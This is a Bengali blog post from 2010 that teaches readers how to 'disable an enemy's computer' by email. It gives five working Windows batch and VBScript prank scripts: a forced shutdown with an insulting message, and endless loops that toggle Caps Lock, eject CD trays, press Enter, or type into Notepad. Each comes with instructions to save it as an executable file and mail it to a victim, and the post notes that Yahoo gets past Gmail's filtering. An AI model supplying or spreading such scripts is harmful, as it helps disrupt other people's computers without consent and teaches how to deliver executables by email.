মঙ্গলবার, ১২ অক্টোবর, ২০১০
মেইল করে শত্রুর কম্পিউটার অচল করে দিন
আজ আমি আপনাদের এমন এক জিনিস দিব যা আপনারা আগে কখনোই আমার কাছে পাননি। আজ আমি যে টিপস দিচ্ছি তা হলো আপনি মেইল করে অন্যের কম্পিউটার অচল করে দিতে পারবেন। তবে তার আগে একটি কথা তা হলো এটি দিয়ে কারো ক্ষতি করবেন না। এটি আপনি রেখে দিন হয়তো পরে কাজে লাগবে।
কিন্তু অকারনে কারো ক্ষতি করবেন না। আর কারো ক্ষতি হলে আমি কিন্তু দায়ী থাকবো না। আমি আপনাদের ৫ টি টিপস দিচ্ছি। এগুলো কপি করে নোটপ্যাড এ পেস্ট করে মেইল এ এটাচ করে পাঠিয়ে দিবেন। জিমেইলে নাও হতে পারে আপনি ইয়াহু দিয়ে মেইল করবেন।
----------
1) Convey your friend a lil’ message and shut down his / her computer:
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
Save it as “Anything.BAT” in All Files and send it.
2) Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
3) Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
5) Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
Save it as “Anything.VBS” and send it.
বিঃ দ্রঃ আপনাকে কেউ মেইলে নোটপ্যাড পাঠালে ভুলেও খুলবেন না।
এতে সদস্যতা:
মন্তব্যগুলি পোস্ট করুন (Atom)
ভাল হইছে কিন্তু তোর মাথায় একটা বাড়ি দেওয়া দরকার।
উত্তরমুছুনসোহেল